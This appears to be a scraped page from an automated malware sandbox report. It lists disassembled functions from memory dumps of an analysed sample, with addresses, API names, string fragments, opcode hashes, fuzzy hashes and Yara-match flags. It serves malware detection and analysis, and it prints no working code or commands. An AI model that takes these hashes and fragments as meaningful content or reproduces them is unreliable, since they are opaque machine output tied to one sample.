                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                        • API String ID: 3446177414-3154609507
                        • Opcode ID: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                        • Instruction ID: 3f32c0e1e4fbdbfc9568f0a73c85dba48647fb69d96aeff8c652237d210d989a
                        • Opcode Fuzzy Hash: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                        • Instruction Fuzzy Hash: CE41D132A056519FCB21CE6CDD40A66BFEDBF8AA90F06056DED49DB351DB30E810CB91
                        Function 0160DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                        • API String ID: 3446177414-3526935505
                        • Opcode ID: 763178d8bd66b190589465fe420437b1438e3fb29ace53886f6738b74e151214
                        • Instruction ID: e56be691ff18dd2f2fe3f2dc2a50b3fcda3972b6b69bfdea16258af67c725390
                        • Opcode Fuzzy Hash: 763178d8bd66b190589465fe420437b1438e3fb29ace53886f6738b74e151214
                        • Instruction Fuzzy Hash: AB31E030105784DFE73BDBACCC49BA67BE9FF41B50F054189E4468BB92CBA8A881C751
                        Function 015DC070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: $
                        • API String ID: 3446177414-3993045852
                        • Opcode ID: a3ae36cdc7558d4444d3a45b5728be1fe3c993211343d5ff5f185e50e1751410
                        • Instruction ID: 7d62a38444a33568134081d2d375a6f325c8688b7b2a7429f9400d783dbaa30c
                        • Opcode Fuzzy Hash: a3ae36cdc7558d4444d3a45b5728be1fe3c993211343d5ff5f185e50e1751410
                        • Instruction Fuzzy Hash: 11116132905219EBCF16AFA4EC486DC7B72FF85365F108119F9266B2D0CB315A50DF44
                        Function 0160EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3eed3d33aee35fc30f259d36136c444d779d137db0d9aea3804d70d642dce6e5
                        • Instruction ID: f97a60cbd7d80cd17c747048999c57ec2532b335df103e43e2a3ea28e696e7fc
                        • Opcode Fuzzy Hash: 3eed3d33aee35fc30f259d36136c444d779d137db0d9aea3804d70d642dce6e5
                        • Instruction Fuzzy Hash: FDE1F270D00608DFCB2ACFA9C984A9EBBF1FF48315F1445AAE956A73A1D771A841CF50
                        Function 0165EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID:
                        • API String ID: 3446177414-0
                        • Opcode ID: 552fc9bc226390322e47fd2556166f110505f97d02bb5b54e4571a0d7bc62a3a
                        • Instruction ID: b0de1a69e5dff4c918f34d8b587778fd7d65a817e1247a611598175cda7d7e17
                        • Opcode Fuzzy Hash: 552fc9bc226390322e47fd2556166f110505f97d02bb5b54e4571a0d7bc62a3a
                        • Instruction Fuzzy Hash: 24716671E012199FDF91CFA8CD84ADDBBB5BF48315F0840AAE905EB350D734A905CBA4
                        Function 0165F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID:
                        • API String ID: 3446177414-0
                        • Opcode ID: d7a23a4294e40b0c37c7df852da3b7f859f37676bd06be9202ecd64baa3099ac
                        • Instruction ID: 8120f0c4963e498d03aebbf591274f192c42312893f492e0a5a99e88e41d546f
                        • Opcode Fuzzy Hash: d7a23a4294e40b0c37c7df852da3b7f859f37676bd06be9202ecd64baa3099ac
                        • Instruction Fuzzy Hash: 815133B2E012199FEF48CF99DC84ADDBBB1BF48355F1880AAE905AB250D7349901CF94
                        Function 01617B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                        • String ID:
                        • API String ID: 4281723722-0
                        • Opcode ID: 7e74817ae30cdd7389002fe086532157b5334cb33b9f0f2afc836396eeb748cf
                        • Instruction ID: 9719e165488a6a9fcaa28635ed07c78378bbcd0b9291337901f0e77cfd5348b1
                        • Opcode Fuzzy Hash: 7e74817ae30cdd7389002fe086532157b5334cb33b9f0f2afc836396eeb748cf
                        • Instruction Fuzzy Hash: E2312572E01229AFCF65DFA8EC84A9DBBF1BB48720F10416AE911B7394DB305940CF54
                        Function 015E59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 8ab0a5727c5bd61ed4167cc59238a5a57fc67598b07b40db829884f3a033e2d4
                        • Instruction ID: ea30baad83805cca84b095ec33144adde5b2e863ff3fd5e3e81ea6e310bdcdae
                        • Opcode Fuzzy Hash: 8ab0a5727c5bd61ed4167cc59238a5a57fc67598b07b40db829884f3a033e2d4
                        • Instruction Fuzzy Hash: 1E325B74D1026ADFDB29CF64C848BEDBBF0BB18308F0085E9D559AB241E7759A84CF91
                        Function 01627D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-
                        • API String ID: 1302938615-2137968064
                        • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                        • Instruction ID: 9591bdc3fd59376ccaabae84d226e5aeb8890c306417d7c80c4526755bed63db
                        • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                        • Instruction Fuzzy Hash: 5291D271E04A3A9BEB24CF6DCC81EBEBBA5AF64320F14451AE955A73C0D7349941CF21
                        Function 015FD02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: Bl$l
                        • API String ID: 3446177414-208461968
                        • Opcode ID: 1abcaa4bc417bb050c28904f66338d95de6101e152cbb46171c766ed8f45f9f7
                        • Instruction ID: 2ce7dc8a35850804b79af7d5c186dc36e64b4799343dd8dd9b0ccde157a92ef0
                        • Opcode Fuzzy Hash: 1abcaa4bc417bb050c28904f66338d95de6101e152cbb46171c766ed8f45f9f7
                        • Instruction Fuzzy Hash: 05A1A431A013298BEB31DB98CC94BADB7B6BB45304F0540EDDA09AB241DB75AE85CF51
                        Function 01625DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                        Download Yara Rule
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 01625E34
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: f2632f95a1de6367d583915d3e66c2880ff7d70f2ec34035de3eabb85ab2e527
                        • Instruction ID: a8495ec6d990e0ef4ace2d99433338960fbfcd2b6259feed8b41b615ab71a705
                        • Opcode Fuzzy Hash: f2632f95a1de6367d583915d3e66c2880ff7d70f2ec34035de3eabb85ab2e527
                        • Instruction Fuzzy Hash: 09517671908E2296E736B71CCD053FE3B94EB00740F20C818E4E78A399EB348895DF4A
                        Function 01614C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0$Flst
                        • API String ID: 0-758220159
                        • Opcode ID: 5f728011c06c12bcf9119572b7e1014e45a4d8b3e55874d7caa55cdb72941f39
                        • Instruction ID: ac15735f88d0e341445941f9e595df075614d1fc9eb92bd6d2b03f123ab2b893
                        • Opcode Fuzzy Hash: 5f728011c06c12bcf9119572b7e1014e45a4d8b3e55874d7caa55cdb72941f39
                        • Instruction Fuzzy Hash: 80519CB2E002158BCF26CF99DC84669FBF4FF44758F59802ED4099B355EB709985CB80
                        Function 0160D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                        Download Yara Rule
                        APIs
                        • RtlDebugPrintTimes.NTDLL ref: 0160D959
                          • Part of subcall function 015E4859: RtlDebugPrintTimes.NTDLL ref: 015E48F7
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: $$$
                        • API String ID: 3446177414-233714265
                        • Opcode ID: d54aa6b448dcc42bb7c663c992e736b9a46e890a881b1f6abf3c920c7e42cdb3
                        • Instruction ID: aa04a36ccd5bf7777a14bebe83e05db94fd30421ddcfbbc8007b93dd8035133d
                        • Opcode Fuzzy Hash: d54aa6b448dcc42bb7c663c992e736b9a46e890a881b1f6abf3c920c7e42cdb3
                        • Instruction Fuzzy Hash: 9F51DE72E002469FDB2ADFE8CC847AEBBB2BF44314F15525DC9056B2C1D770AA52CB90
                        Function 0165FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: $
                        • API String ID: 3446177414-3993045852
                        • Opcode ID: 4aa862a5196271d521e6ad8a78fa8c07fc92024ce2e545280de74be830a4393c
                        • Instruction ID: d7f97bad46ef28367247bbe8f22ef0eb95d3eb225a78aca98f3cbb033fd014df
                        • Opcode Fuzzy Hash: 4aa862a5196271d521e6ad8a78fa8c07fc92024ce2e545280de74be830a4393c
                        • Instruction Fuzzy Hash: E6418AB5A01209ABDB51DF99CD80AEEBBB6BF48B04F140199ED04AB341D7719911DBA0
                        Function 015DDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: 0$0
                        • API String ID: 3446177414-203156872
                        • Opcode ID: 5275806ca04f651f58e0956ac0449ed0644477e0fc7eadc9902cbff231b3f5ab
                        • Instruction ID: 6211ac86131617544089d027f2c14909511204c50bfb1bc5f4c8fa079af9f290
                        • Opcode Fuzzy Hash: 5275806ca04f651f58e0956ac0449ed0644477e0fc7eadc9902cbff231b3f5ab
                        • Instruction Fuzzy Hash: CB415BB1A087069FD321CF2CC884A1ABBE5FB89314F04496EF588DB341D771E905CB96

                        Executed Functions

                        Function 02FD77EF Relevance: 54.4, Strings: 43, Instructions: 635COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "4$$$$4$*$*:$*G$*z$+$+$,K$-$0$3$4$8U$:-$A$B$C$E$H$J$Kh$Q$R$RU,$SL$Us$V$V$[$e[$k$m$n$p$w$w_$z$,$`$c$u
                        • API String ID: 0-811391167
                        • Opcode ID: 6f63bc9fd5b92450d303a8fbf987dfd0a4e261a9c8c50b60002a39f4b7b2dfa0
                        • Instruction ID: 842a46c0923aa9bb65e78b43842695b42e89a1f1fcafb0d667508d3f9311068c
                        • Opcode Fuzzy Hash: 6f63bc9fd5b92450d303a8fbf987dfd0a4e261a9c8c50b60002a39f4b7b2dfa0
                        • Instruction Fuzzy Hash: CB728DB0E05229CBEB24CF45CD98BEDBBB2BB45348F1482D9D50D6B281C7B55A89CF50
                        Function 02FE5373 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 6$O$S$\$s
                        • API String ID: 0-3854637164
                        • Opcode ID: a6eb4fb8affc4e6510aa563a0c97470e4c66ee5679be549872e3326d6f2e7225
                        • Instruction ID: fe23dcaf0da7b712e4ee0eaf77f0ff82debe92f2a6c8815a57fdb4075962d850
                        • Opcode Fuzzy Hash: a6eb4fb8affc4e6510aa563a0c97470e4c66ee5679be549872e3326d6f2e7225
                        • Instruction Fuzzy Hash: D041B5B2D00218BBDB11EA94ED48FEAF3B9EF44355F444199EB09A7100E771AA548FE1
                        Function 02FF2ED3 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: zL
                        • API String ID: 0-3949170232
                        • Opcode ID: 868d137dbf67a380431c1016d2584ac3d50750c1a37b4620374ba1dec24c8ef3
                        • Instruction ID: b9028676098ee5b50a26b62434f93de45b417296ad00b6fa349b80d1630daf35
                        • Opcode Fuzzy Hash: 868d137dbf67a380431c1016d2584ac3d50750c1a37b4620374ba1dec24c8ef3
                        • Instruction Fuzzy Hash: 1411FBB2D0121CAF9B40DFE9DD409EEBBF9EF48250F14456AE919E7200E7705A048FA1
                        Function 02FD1394 Relevance: .1, Instructions: 136COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f1aa024bdf4c66b07b43305a8921d8b9ea161f69727c14eb89fc51451aae7c1
                        • Instruction ID: 46c67ef65f85cde5c410f6b2787da66f218023b1f7c4eda2f6bcaec41358a938
                        • Opcode Fuzzy Hash: 2f1aa024bdf4c66b07b43305a8921d8b9ea161f69727c14eb89fc51451aae7c1
                        • Instruction Fuzzy Hash: 854119B1D11218AFDB14CF99DC81AEFBBB9EF49750F14415AFA18A7240E7B09641CBA0
                        Function 02FF4F23 Relevance: .1, Instructions: 82COMMON
                        Download Yara Rule
